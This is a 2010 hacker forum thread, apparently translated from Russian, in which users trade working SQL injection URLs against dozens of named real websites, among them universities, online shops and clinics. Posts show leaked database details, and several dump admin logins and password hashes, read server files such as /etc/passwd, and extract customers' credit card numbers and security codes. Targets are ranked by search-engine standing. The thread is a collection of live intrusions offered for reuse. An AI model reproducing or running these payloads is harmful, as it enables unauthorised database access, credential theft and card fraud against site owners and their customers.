
View full version: SQL Injections



MastaBass1
03.12.2010, 19:11
http://www.ruit.ru/?Page=news&nID=25+and+1=0+union+select+1,2,3,concat_ws(0x3a,d atabase(),version(),user()),5

ruitru83_xmb1:4.1.25-log:ruitru83_xmb1@localhost

Gorev
03.12.2010, 19:27
http://www.rentacrate.com/press.php?id=-6+union+select+1,concat_ws%280x3a,version%28%29,da tabase%28%29,user%28%29%29,3,4,5

4.1.22-standard:rentacrate:rentacrate@lsh1006.lsh.sitepro tect.com

bloodAngel
03.12.2010, 20:31
blind


Code:
http://stomat-clinic.ru/php/content.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19--

TIC 350


Code:
http://stomat-clinic.ru/php/content.php?id=1+and%20substring%28version%28%29,1 ,1%29=5

version 5


Code:
http://www.windsurf-seliger.ru/newsone.php?id=105-999.9+union+select+1,2,concat%280x3a,version%28%29 ,0x3a,database%28%29,0x3a,user%28%29%29,4,5,6--

5.0.51-log:2007941_1:b2007941_1@localhost TIC 40

Linkus
04.12.2010, 04:24
Code:
http://www.diplomna.com/moreinfo.php?diplomID=7333666%27+UNION+SELECT+1,2, 3,4,5,group_concat%28table_name%29,7,8,9,10,11,con cat_ws%280x3a3a,version%28%29,database%28%29,user% 28%29,@@version_compile_os%29+from+information_sch ema.tables+--+

TIC: 30


Code:
http://elib.tolgas.ru/catalog/view.php?id=-7333666%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12 ,unhex%28hex%28group_concat%28concat_ws%280x3a3a,i d,user,pass%20%29%29%29%29,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54, 55,56,57,58,59,60,61+from+userlist+--+

TIC: 325

PR: 4

Gorev
04.12.2010, 08:51
http://eastwestopticians.com/?page=show_ma_products.php&m_id=-5+/*!union*/+select+1,concat%28version%28%29,0x3a,database%28% 29%29,3+--+

5.0.91-community:eastwest_db1

Konqi
05.12.2010, 13:42
_http://www.nmr.mgh.harvard.edu/martinos/people/showPerson.php?people_id=83+or+1+group+by+concat(( select+version()+from+information_schema.tables+li mit+0,1),floor(rand(0)*2))having+min(0)+or+1--

heks
05.12.2010, 15:48
http://library.umd.umich.edu/research/cat.php?cat=Reference+and+1=0+union+select+concat_ ws(0x3a,user_name,user_password),2,3,4,5,6+from+DE V_mediawiki.ts_user+--+

Gorev
05.12.2010, 22:05
http://www.procurement.ltd.uk/press.php?id=-14+UNION+SELECT+1,concat_ws%280x3a,version%28%29,d atabase%28%29,user%28%29%29,3,4,5--%20+

Database Version: 4.0.30-log

Database name: u10123203

User name: u10123203@lon1-webmysql-2.msh.demon.net

Konqi
05.12.2010, 22:09
I'll expose one more Harvard

_http://librarylab.law.harvard.edu/shelflife/author/OHagan'+or+(1,1)=(select+count(0),concat((select+v ersion()+from+information_schema.tables+limit+0,1) ,floor(rand(0)*2))from(information_schema.tables)+ group+by+2)--+

Gorev
05.12.2010, 22:30
http://www.sharonmccormickdesign.com/press.php?id=30%27+UNION+SELECT+1,concat_ws%280x3a ,version%28%29,database%28%29,user%28%29%29,3,4--%20+



4.1.20:sharonmccormickdesign_com_-_sitecontent:sharonmccormick@localhost

Unknown
05.12.2010, 22:32
http://imagine-dev.kent[antigoogle].edu/media/content/press.asp?id=712 union select 1,2,3,4,5,6,7,8,9,password,11,12,13,14,15,16,17 from users

TIC 275 PR 7

Gorev
05.12.2010, 22:47
http://www.culturalcapital.us/press.php?id=-8+UNION+SELECT+1,concat_ws%280x3a,version%28%29,da tabase%28%29,user%28%29%29,3,4,5,6,7,8,9,10,11,12, 13--+

5.0.45:USCC:xtuscc@localhost

~d0s~
06.12.2010, 15:20
http://www.wdminc.com/products/productdetails.php?prodID=-605+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9--

4.1.22:wdminc@localhost:wdminc

no access to information_schema

http://www.zenunderwater.com/products.php?prodID=5+and+1=0+union+select+1,conca t_ws(0x3a,version(),user(),database()),3,4,5,6,7,8 ,9,10,11--

4.1.22-standard:zenunder_zen@localhost:zenunder_zen

http://www.asiabs.com/document/doc_info.php?_id=-25+union+select+concat_ws(0x3a,version(),user(),da tabase()),2,3,4,5,6,7,8,9,10--

http://www.asiabs.com/document/doc_info.php?_id=-25+union+select+concat_ws(0x3a,user_name,password) ,2,3,4,5,6,7,8,9,10+from+user_permission+limit+1,1-- (passwords)

5.1.48-msl-usrs-sure1-log:everyone@s215.sureserver.com.sureserver.com:as iabs_M_and_A

http://www.vaargroephoofddorp.nl/index.php?newsgroup=29+and+1=0+union+select+1,conc at_ws(0x3a,version(),user(),database()),3,4,5,6,7, 8,9,10,11,12,13--

5.0.77:vaargroe@localhost:vaargroe

http://www.wareonline.co.uk/drillhall/default.asp?pid=-36+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8+from+hertsweb_joomla.wcow_ users--

http://www.wareonline.co.uk/drillhall/default.asp?pid=-36+union+select+1,2,3,concat_ws(0x3a,username,pass word),5,6,7,8+from+hertsweb_joomla.wcow_users-- (passwords)

5.0.51b-community-nt-log:hertsweb@81.27.104.42:hertsweb_main

http://www.sourcecodesworld.com/source/show.asp?ScriptID=-1032+union+select+1,concat_ws(0x3a,version(),user( ),database()),3,4,5,6,7,8,9,10,11,12,13--

4.0.30-max-log:vyom_source@208.109.138.203:vyom_source

http://www.covast.com/news/press.asp?id=-95+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8,9,10,11--

http://www.covast.com/news/press.asp?id=-95+union+select+1,2,3,concat_ws(0x3a,userid,passwo rd),5,6,7,8,9,10,11+from+users-- (passwords)

5.0.91-community:a0195032_@localhost:a0195032_

http://www.igps.net/about/press.php?id=-42+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6,7,8--

5.0.51a-24+lenny4-log:Igpsweb1db@LH7800.intermedia.nethpdig

http://www.mysweetbio.es/esp/marche_descr.asp?id=27+or+1=(select+db_name())--

beautysql - DB

http://www.nitevibe.com/gallery2/gal_descr.asp?gallery_id=18+or+1=@@version--

Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86) Jul 9 2008 14:43:34 Copyright (c) 1988-2008 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 2) - version

http://www.nowccc.com/detail.asp?car_cd=5017+or+1=@@version--

fl00der
06.12.2010, 17:24
A couple of mid-sized sites

PR 4, TIC 60

http://www.pcid*t*b*se.com/vendor_det*ils.php?id=-240+UNION+SELECT+1,2,3,user(),version(),d*t*b*se() ,7,8,9 Replace the asterisk with a.

Unfortunately, I didn't find anything interesting in the database.

Here's another site; we poked at it but didn't find anything either:

PR 5, TIC 30

f cm.d k/index.php?mode=spillerinfo&ID=6%27&holdID=3&spillerID=-54%27+UNION+SELECT+1,2,3,4,5,user(),version(),d*t* b*se(),9,t*ble_n*me,11,12,13,14+FROM+inform*tion_s chem*.t*bles+LIMIT+1,1+--+ If you do manage it after all, PM me.

Unknown
06.12.2010, 17:40
Following up on Konqi's posts:

http://mitchison.med.[antigoogle]harvard.edu/people/peopleinfo.html?ID=-4 union select 1,concat_ws(0x3a,version(),user(),database()),3,4, 5,6,7,8,9,1,2,3,4--

N@b$ter
06.12.2010, 18:28
http://www.ticostorecr.com/ver_categoria.php?id=3+and+1=-0+union+select+concat_ws(0x3a,passwd)+from+users--

JohnnyBGoode
06.12.2010, 23:51
http://www.amatue21.com/index.php?do=photo&albom=7+or+1+group+by+concat((select+concat(versio n(),0x3a,user(),0x3a)),floor(rand(0)*2))+having+av g(0)+--+

5.0.91-community-log:amatue21_com@localhost

Gorev
07.12.2010, 00:11
http://www.supplementalhealthcare.com/press.php?id=3%27+UNION+SELECT+1,2,unhex%28hex%28c oncat_ws%280x3a,version%28%29,database%28%29,user% 28%29%29%29%29,4,5,6,7+LIMIT+1,1--%20+

4.1.11-Debian_4sarge8-log:supp78:shcsupport@tuna10.xmission.com

[AvareC]
07.12.2010, 04:26
removed at the site owner's request

Gorev
07.12.2010, 09:40
http://www.laterna.net/laterna/press.php?ID=-pollanenm%27+UNION+SELECT+1,2,3,concat_ws%280x3a,v ersion%28%29,database%28%29,user%28%29%29,5,6,7,8, 9,10,11,12,13--+

4.1.22-standard-log:laterna:laterna@10.1.0.8

Gorev
07.12.2010, 14:39
http://www.eksigent.com/hplc/news/press.php?id=15+UNION+SELECT+concat_ws%280x3a,vers ion%28%29,database%28%29,user%28%29%29,2,3,4--

5.1.41-3ubuntu12:ekDB:ekUser@10.179.43.192

*uNkN0Wn*
07.12.2010, 18:01
http://avcboostwerx.com/index.php?cid=-1+union+select+1,2,concat(username,0x3,password),4 ,5,6,7+from+avcboost_furniture.admin_user+--+


avcboost_valant@localhost

5.1.47-community-log


http://maxconsole.net/trainers/index.php?cid=-1+union+select+group_concat(username,0x3,password) ,2,3,4,5,6,7,8,9,10,11,12,13+from+maxconforum.user--


maxwww@localhost

5.1.52-log

Konqi
07.12.2010, 23:16
http://www.programmershelp.co.uk/showcode.php?e=575+union+select+1,2,current_user,4 ,5,6

Gorev
07.12.2010, 23:19
http://www.oltamar.ru/press.php?id=-7%27+UNION+SELECT+1,concat_ws%280x3a,version%28%29 ,database%28%29,user%28%29%29,3,4,5,6--%20+

5.0.77:u5170ltamar.ru@localhost

winstrool
08.12.2010, 00:03
_http://www.trabajos.bz/verempresa.php?idemp=-625+union+select+1,2,concat_ws(0x3a,admin_user,adm in_pass),4,5,6+from+admin--

bloodAngel
08.12.2010, 16:40
Code:
http://www.hsx.com/forum/forum.php?id=1+and+substring%28@@version,1,1%29=5

version 5

av1
08.12.2010, 19:47
Code:
http://bioethics.net/resources/index.php?sid=494263798&id=-1533+UNION+SELECT+1,concat_ws%280x3a,user%28%29,ve rsion%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18%20from%20user--&t=rate&toprate=1.9999&tophits=19289

Username: dbo97930092@74.208.16.75

Version: 4.0.27-max-log

Database: db97930092

Google PR: 7

Konqi
08.12.2010, 23:16
Code:
http://www.awesometheory.com/tutorial.php?id=1+and+1=9+union(select+1,2,3,4,ver sion())

~d0s~
08.12.2010, 23:19
ualberta.ca

TIC - 950

PR - 8

http://www.psych.ualberta.ca/people/showperson.php?id=-13+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8,9,10,11,12,13,14--

5.0.88-log:web@localhost:department

http://www.psych.ualberta.ca/people/showperson.php?id=-13+union+select+1,2,3,concat_ws(0x3a,table_name,ta ble_schema),5,6,7,8,9,10,11,12,13,14+from+informat ion_schema.tables--

http://www.psych.ualberta.ca/people/showperson.php?id=-13+union+select+1,2,3,concat_ws(0x3a,user,password ,file_priv),5,6,7,8,9,10,11,12,13,14+from+mysql.us er-- (MySQL users)

http://www.psych.ualberta.ca/people/showperson.php?id=-13+union+select+1,2,3,concat_ws(0x3a,user_login,us er_pass),5,6,7,8,9,10,11,12,13,14+from+westbury.wp _users-- (WordPress users)

There's also phpBB and some lesser-known engines; look on the subdomains, there are many of them!

попугай
09.12.2010, 02:48
http://www.rociojuradofanclub.com/discografia/album.php?musica=1&album=-3/*!union+select!*/1,2,3,4,5,6,7,8,9,version(),11,12,13

~d0s~
09.12.2010, 02:50
oitbrasil.org.br

PR 7

http://www.oitbrasil.org.br/ipec/imp/ler_clipping.php?id=-3014+union+select+1,concat_ws(0x3a,version(),user( ),database()),3,4--

http://www.oitbrasil.org.br/ipec/imp/ler_clipping.php?id=-3014+union+select+1,concat_ws(0x3a,user,host,passw ord,file_priv),3,4+from+mysql.user+--+ (mysql users)

http://www.oitbrasil.org.br/ipec/imp/ler_clipping.php?id=-3014+union+select+load_file(0x2f6574632f7061737377 64),2,3,4+from+mysql.user (etc/passwd)

http://www.oitbrasil.org.br/ipec/imp/ler_clipping.php?id=-3014+union+select+load_file(0x2f7573722f6c6f63616c 2f617061636865322f6c6f67732f6572726f725f6c6f67),2, 3,4+from+mysql.user (error_log)

http://www.oitbrasil.org.br/ipec/imp/ler_clipping.php?id=-3014+union+select+load_file(0x2f6574632f6d792e636e 66),2,3,4+from+mysql.user (etc/my.cnf)

http://www.oitbrasil.org.br/ipec/imp/ler_clipping.php?id=-3014+union+select+load_file(0x2f7573722f6c6f63616c 2f617061636865322f636f6e662f68747470642e636f6e66), 2,3,4+from+mysql.user (httpd.conf)

Cennarios
09.12.2010, 02:55
Marriage agency

http://www.bride4you.by/anketa.php?anketa_id=2'+and+1=0+union+select+1,2,v ersion(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38--+

~d0s~
09.12.2010, 14:55
aciprensa.com

PR - 7

http://www.aciprensa.com/Cine/pelicula.php?id=-165+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6,7,8--

5.0.84:aciprensa@localhost:aciprensa

http://www.aciprensa.com/Cine/pelicula.php?id=-165+union+select+1,concat_ws(0x3a,usr_user,usr_pas sword),3,4,5,6,7,8+from+usuario+limit+0,1-- (Passwords)

multimagen.com

PR 5

http://www.multimagen.com/videos/cine.php?id=-127+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9--

5.0.91-community:multimag_multi@localhost:multimag_multim agen

http://www.multimagen.com/videos/cine.php?id=-127+union+select+1,2,concat_ws(0x3a,usuario,clave) ,4,5,6,7,8,9+from+sis_usuarios_administrador+limit +0,1-- (passwords)

~d0s~
09.12.2010, 18:42
cinefantastico.com

PR - 5

http://www.karmafilms.es/ficha_cine.php?ID=-15+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3 a,version(),user(),database()),12,13,14,15,16,17,1 8,19--

5.0.51a-log:karmafilms@localhost:34381wp2009111

http://www.karmafilms.es/ficha_cine.php?ID=-15+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3 a,user_login,user_pass),12,13,14,15,16,17,18,19+fr om+wp_users-- (WordPress passwords)

N@b$ter
09.12.2010, 21:33
http://www.spaghetticlubs.org/review.php?review_id=6211-999.9+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,ve rsion(),user(),database()),9,10,11--

5.0.91-community-log:spaghett_web@localhost:spaghett_bookclub

PR 5

http://www.avoarchive.com/display.php?id=1216-999.9+union+select+1,concat_ws(0x3a,user(),version (),database()),3,4,5,6,7,8--

ignhill_2_w@209.68.4.84:5.0.91-log:ignhill_maradv

PR 3

av1
09.12.2010, 22:11
Freeware Files - Free Software Downloads


Code:
http://www.freewarefiles.com/screenshot.php?programid=-17839+UNION+SELECT+1,2,3,4,concat_ws%280x3a,user%2 8%29,version%28%29,database%28%29%29,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8--

Username: fwfiles4_freewar@localhost

Version: 4.1.22-standard-log

Database: fwfiles4_freeware

Google PR: 5

~d0s~
10.12.2010, 03:19
http://www.marketindia.com/show_item_details.asp?item_id=125+or+1=(select+top +1+quotename(cc_auth_code%2B':'%2Bcc_auth_date)+fr om+orders)+--+

Konqi
10.12.2010, 14:56
http://www.brokensilence.biz/php.php?u=539+and+1=0+union+select+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,v ersion(),43,44,45,46,47,48,49,50,51,52,53,54,55,56 ,57--+

~d0s~
10.12.2010, 16:47
rocketry.org

PR 4

http://www.rocketry.org/news/newsStory.php?newsID=-10+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10,11+--+

z0mbyak
10.12.2010, 17:42
http://
www.mosteatr.ru
/index.php?nav=profile&sid=239+union+select+1,group_concat%28table_name%2 9,3,4+from+information_schema.tables--


TIC 60 PR 3

Yandex.Catalog: Theatre and concert tickets

Keltos
10.12.2010, 21:47
A few from me.


Code:
http://magpol.ru/e107_plugins/nboard/doadd.php?id=1%20and%200%20union%20select%201,2,ve rsion%28%29,4

5.0.26-log


Code:
http://www.baikonure.ru/e107_plugins/nboard/doadd.php?id=1%20and%200%20union%20select%201,2,ve rsion%28%29,4

5.0.91-community


Code:
http://www.itsfclan.it/e107_plugins/nboard/doadd.php?id=1%20and%200%20union%20select%201,2,ve rsion%28%29,4



Code:
http://pub-tower.ru/e107_plugins/roll_mini/roll.php?cat=1%27%20and%200%20union%20select%201,2 ,concat_ws%20%28%22%27%22,user_loginname,user_pass word%29,4,5,6%20from%20e107_user%20limit%200,1--%20&card_id=109



Code:
http://sempervivum-liste.de/e107_plugins/roll_mini/roll.php?cat=1%27%20and%200%20union%20select%201,2 ,concat_ws%28%22%27%22,user_loginname,user_passwor d%29,4,5,6%20from%20e107_user%20limit%200,1--%20&card_id=109



Code:
http://www.aacgc.com/SSGC/e107_plugins/aacgc_pnews/News.php?1.2%20and%200%20union%20select%201,concat _ws%280x3a,user_loginname,user_password%29,3%20fro m%20e107_user%20limit%200,1

Bb0y
11.12.2010, 01:53
http://www.bakertillynepal.com/newslist.php?id=-4+union+select+1,concat_ws(0x3a,user_id,login_name ,login_pwd,user_email),3,4,5,6,7,8,9,10,11,12+from +btn_user+--

http://soku-au.com/newslist.php?id=-4+union+select+1,2,3,group_concat(0x0b,id,0x3a,use rname,0x3a,userpwd),5,6,7,8,9+from+admin+--

~d0s~
11.12.2010, 02:19
http://snow-country.jp/contents.php?id=-142+union+select+1,concat_ws(0x3a,username,passwor d),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22+from+c_admin_user+--+

http://fan.nikko-aizu.com/contents.php?id=-94+union+select+1,2,3,4,5,concat_ws(0x3a,username, password),7,8,9,10,11,12,13,14,15,16,17,18,19,20+f rom+c_admin_user--

Gorev
11.12.2010, 12:07
http://www.super55.com/lab.php?id=1562+UNION+SELECT+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60, 61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77 ,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,9 4,95,96,97,98,99,100,101,102,103,104,105,106,107,1 08,109,110,111,112,113,114,115,116,concat_ws%280x3 a,version%28%29,database%28%29,user%28%29%29,118,1 19,120,121,122,123,124,125,126+LIMIT+1,1--%20&lang=slov&word=%20%20neutrofily

5.1.48-msl-usrs-sure1-log:super55_szotar:super55@localhost

попугай
11.12.2010, 14:12
http://redbox.sg/products.php?cat_id=-61+union+select+1,2,3,concat_ws(0x3a,user(),versio n(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17, 18+from+user--

bdlik_bdlik@localhost:5.0.91-community:bdlik_redboxx

S$7.00

N@b$ter
11.12.2010, 14:20
http://www.the8unit.com.my/news.php?id=5-999.9+union+select+1,2,concat_ws(0x3a,username,pas sword),4,5,6,7,8,9+from+user--

Cennarios
11.12.2010, 16:32
MSSQL

http://www.ifocus.us/default.asp?pageid=7&deptid=7+or+1=(select+db_name())--

DB: aware_ifocus-consulting

tables: Content, ContentStatus

~d0s~
11.12.2010, 16:40
http://proroad.net/produit.php?id=-6+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6--

http://proroad.net/produit.php?id=-6+union+select+1,2,3,concat_ws(0x3a,user,pass),5,6 +from+tbl_admin--

Koren
12.12.2010, 21:40
Online Shop cc

http://www.shakuhachi.net.au/product_detail.php?id=id=-99+/*!UnIoN+SeLeCt*/+1,2,3,cOnCaT%28cust_fname,0x3a,cust_lname,0x3a,cu st_email,0x3a,cust_address,0x3a,cust_country,0x3a, cookie_code,0x3a,order_status,0x3a,order_date,0x3a ,city,0x3a,state,0x3a,poscode,0x3a,phone,0x3a,mobi le,0x3a,card_name,0x3a,card_number,0x3a,credit_exp ,0x3a,card_security%29,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18+from+m_order%20where%20credit_exp!=0 limit 213,812--

nemaniak
13.12.2010, 00:19
www.sgsits.ac.in PR-5


Code:
http://www.sgsits.ac.in/pages/facultdetail.php?fid=58%27+union+select+1,2,3,4,un hex%28hex%28concat_ws%280x3a,version%28%29,user%28 %29,database%28%29%29%29%29,6,7,8,9,0,11,12,13,14, 15,16,17,18,19,20,21,22,23,24+--+



Code:
4.1.7:root@web2.sgsits.ac.in:sgsits


www.romislokus.com TIC-130

blind


Code:
http://www.romislokus.com/eng/radios.php?num=102+and+substring%28%28select+versi on%28%29%29,1,1%29=5



Code:
5.0.77-log:romislokus@10.10.0.1:romislokus

~d0s~
13.12.2010, 01:49
familyrapp.com

PR 4

http://www.familyrapp.com/Results/recipe_book_category_results_review.asp?BookID=150 8+or+1=@@version (2000 branch, no xml raw support)

http://www.familyrapp.com/Results/recipe_book_category_results_review.asp?BookID=150 8+or+1=(select+top+1+username+from+login+where+use rname+not+in+(select+top+0+username+from+login)) (users)

http://www.familyrapp.com/Results/recipe_book_category_results_review.asp?BookID=150 8+or+1=(select+top+1+password+from+login+where+pas sword+not+in+(select+top+0+password+from+login)) (passwords)

winstrool
13.12.2010, 18:51
_http://fmv.bz/jp/item.php?i=-24+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,ver sion(),user(),database()),10,11,12--

5.0.51a-log:sd_dba_LTkzODky@cgi07.unix:sddb0025016300

~d0s~
13.12.2010, 22:36
indusites.com

http://indusites.com/press/press-release-details.asp?id=141+or+1=@@version (2005 branch)

http://indusites.com/press/press-release-details.asp?id=141+or+1=(select+top+1+table_name+f rom+information_schema.tables+where+table_name+not +in+(select+top+9+table_name+from+information_sche ma.tables)) (the table we need)

http://indusites.com/press/press-release-details.asp?id=141+or+1=(select+top+1+column_name+ from+information_schema.columns+where+table_name=' tblAdmin'+and+column_name+not+in+(select+top+0+col umn_name+from+information_schema.columns+where+tab le_name='tblAdmin'+group+by+column_name)+group+by+ column_name+for+xml+raw) (enumerating the columns)

http://indusites.com/press/press-release-details.asp?id=141+or+1=(select+quotename(username %2B':'%2Buserpassword)+from+tblAdmin) (admin login and password)

http://indusites.com/admin/ (the admin panel itself)

попугай
13.12.2010, 23:17
http://ichep04.ihep.ac.cn/db/abs_cont1.php?session_no=3&id=-548+union+select+1,unhex(hex(concat_ws(0x3a,user,p assword))),3,4,5,6,load_file('/etc/passwd'),8,9,0,11,12,13,14,15,16,17,18,19+from+mys ql.user--

Keltos
14.12.2010, 07:56
HTML:
http://www.kimallansilk.com/productdetail.php?proid=-1+union+select+1,2,aes_decrypt(aes_encrypt(group_c oncat(table_name),1),1),4,5,6,7,8,9,10,11+from+inf ormation_schema.tables+limit+0,1--



HTML:
http://www.forest-products.co.uk/products.php?id=-181+UnIon+selECt+1,2,3,aes_decrypt(aes_encrypt(gro up_concat(table_name),1),1),5,6,7,8,9,10+from+info rmation_schema.tables+limit+0,1--

~d0s~
14.12.2010, 15:02
http://www.pricon.co.in/newsview.php?newsid=7+and+1=0+union+select+1,2,con cat_ws(0x3a,user,password,host,file_priv),4,5,6,7, 8+from+mysql.user

http://www.pricon.co.in/newsview.php?newsid=7+and+1=0+union+select+1,2,loa d_file(0x2f6574632f706173737764),4,5,6,7,8

Keltos
14.12.2010, 19:21
HTML:
http://www.boredatuni.com/stuff.php?stuffId=-73+union+select+1,aes_decrypt(aes_encrypt(group_co ncat(table_name),1),1),3+from+information_schema.t ables+limit+0,1--



HTML:
http://www.toonecards.com/view-free-stuff.php?id=-20+UnIon+selECt+1,2,3,4,5,6,user(),8,9,10,11,12,13 ,14,15,16,17,18,19,20+--+



HTML:
http://www.sandwichbau.de/newsview.php?newsid=-118+UnIon+selECt+1,2,3,4,5,aes_decrypt(aes_encrypt (group_concat(table_name),1),1),7,8,9,10,11+from+i nformation_schema.tables+limit+0,1--



HTML:
http://www.antoniandalison.co.uk/shop.php?category=-4+union+select+1,aes_decrypt(aes_encrypt(group_con cat(table_name),1),1)+from+information_schema.tabl es+limit+0,1--



HTML:
http://www.griefencounter.org.uk/shop.php?ShopID=-5+union+select+1,version(),3,4--+



HTML:
http://www.skye.co.uk/local-media-shop.php?catid=-14+union+select+1,2,aes_decrypt(aes_encrypt(group_ concat(table_name),1),1),4,5,6+from+information_sc hema.tables+limit+0,1--



HTML:
http://www.brokenpencil.com/view.php?id=-5392+UnIon+selECt+1,2,3,4,5,aes_decrypt(aes_encryp t(group_concat(table_name),1),1),7,8,9,10,11,12+fr om+information_schema.tables+limit+0,1--



HTML:
http://www.31girl.com/shop.php?pid=-1+union+select+1,2,3,4,concat_ws(0x3a,FirstName,La stName,ShippingAddress,Country,City,State,Zip,Emai l,Phone,CreditCardType,CreditCardNumber,CreditCard Name,CreditCardExpiryDate,CreditCardPinNumber),6,7 ,8+from+shop_orders--

~d0s~
14.12.2010, 19:35
http://www.alcobex.com/newsview.php?newsid=-11+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,user(),database()),7,8,9,10-- (output in the title)

http://www.sandwichbau.de/newsview.php?newsid=-85+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,user(),database()),7,8,9,10,11--

http://snow-country.jp/festival/contents.php?id=-10+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4--

ALIM
14.12.2010, 22:26
http://www.job-passport.com/en/activity_detail.php?actid=-21%20union%20select%201,2,3,4,version(),6,7,8,9,10 ,11,12 --

couldn't find the admin panel

ver:5.0.77

datadir:/var/lib/mysql/

base:jobpass_test

tmpdir:/tmp/

user:jobpass@localhost

os:redhat-linux-gnu

basedir:/usr/

Bb0y
15.12.2010, 01:52
http://www.povareschka.ru/prod.php?id=4+union+select+1,table_name,3,4,5,6,7, 8+from+information_schema.tables+--&sort=9

tables: administrator, user

---------------------------------------------------

http://www.ucamind.com/prod.php?id=4+union+select+1,group_concat(0x0b,id, 0x3a,username,0x3a,password),3,4,5,6,7,8+from+admi nlogin+--

~d0s~
15.12.2010, 02:10
http://www.maind.com/catalog/add2cart.asp?id=-26+union+select+1,2,3,4,5,concat_ws(0x3a,database( ),user(),version()),7,8,9,10,11,12,13,14,15,16,17

http://www.maind.com/catalog/add2cart.asp?id=-26+union+select+1,2,3,4,5,concat_ws(0x3a,username, password),7,8,9,10,11,12,13,14,15,16,17+from+admin

Bb0y
15.12.2010, 02:31
http://www.npomagr.ru/prod.php?id=4+union+select+1,2,3,concat_ws(0x3a,ID ,Name,Password),5,6+from+_magr_users--

~d0s~
15.12.2010, 02:59
http://www.breedjewelry.com/view_detail.asp?id=395+or+1=@@version--

http://www.breedjewelry.com/view_detail.asp?id=395+or+1=(select+top+1+quotenam e(userid%2B':'%2Bpassword)+from+admin)--

Keltos
15.12.2010, 15:57
HTML:
http://www.walkerbooks.com/books/catalog.php?key=-883+UnIon+selECt+1,2,aes_decrypt(aes_encrypt(group _concat(table_name),1),1),4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25+from+informati on_schema.tables+limit+0,1--



HTML:
http://museummasterworks.com/Catalog.php?page=-3+UnIon+selECt+1,aes_decrypt(aes_encrypt(group_con cat(table_name),1),1),3,4+from+information_schema. tables+limit+0,1--



HTML:
http://www.southiceland.com/main.php?cat=-2+UnIon+selECt+1,2,aes_decrypt(aes_encrypt(group_c oncat(table_name),1),1),4,5,6,7,8,9+from+informati on_schema.tables+limit+0,1--

~d0s~
15.12.2010, 16:22
christianactivities.com

PR 5

http://www.christianactivities.com/artistupdates/story.asp?ID=-4308+union+select+concat_ws(0x3a,user(),version(), database()),2,3,4,5,6,7,8,9,10,11,12--

http://www.soupbase.com/view.asp?cid=2706+or+1=@@version

http://wecsa.co.za/squadupdates.asp?id=1+or+1=@@version

Bb0y
15.12.2010, 18:17
http://www.thesame-innovation.com/Thesame/Prod/Prod.php?Id=-4+union+select+1,group_concat(0x0b,Id_Admin,0x3a,T itre_Admin,0x3a,Pass_Admin),3,4,5+from+Admin+--

~d0s~
15.12.2010, 18:25
gmvnl.com

PR - 6

http://www.gmvnl.com/newgmvn/updates/updates.asp?id=12+or+1=(select+system_user)--

http://www.mrtoys-games.com.au/Store_details.asp?ID=6+or+1=@@version

FindeR
16.12.2010, 19:36
http://sosintim.ru/search.php?search=asd%27+and+1=0+union+select+1,2, 3,4,5,version%28%29,7+--+

~d0s~
16.12.2010, 20:50
http://support.optis-world.com/press_release_details.asp?Product_id=12281+or+1=@@ version

http://www.hirestrategy.com/articles/feature_content.asp?ID=56+or+1=@@version

http://www.mrsfixit.com/fixits/FixitCategoryList.asp?id=69+or+1=@@version

FindeR
17.12.2010, 01:29
http://www.che-esche.ru/posts.php?id=-100+union+select+1,2,3,4,group_concat(TABLE_NAME), 6,7,8,9+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,10+--+

table users_tbl

/////printthread.php?t=21336&page=293&pp=40

http://www.che-esche.ru is the same as http://www.che-esche.com

moodoone
18.12.2010, 20:07
Code:
http://www.radioera.com.ua/aboutprog/?idArticle=-12+union+select+1,2,3,version%28%29,5,6,7,8,9,10--

TIC: 450

Output in the title

Konqi
18.12.2010, 23:38
http://engr.oregonstate.edu/oregonstater/citation.php?id=290+and+1=0+union+select+1,2,3,4,5 ,6,7,8,9,10,11

FindeR
19.12.2010, 02:47
http://www.travelsecrets.com/traveldeals.html?category=Ho%27+union+select+1,2,3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24+--+

5.0.51a-24+lenny4-log

mysql.users is accessible

But I couldn't crack the root password hash.

Hack_ERR++
19.12.2010, 07:23
Code:
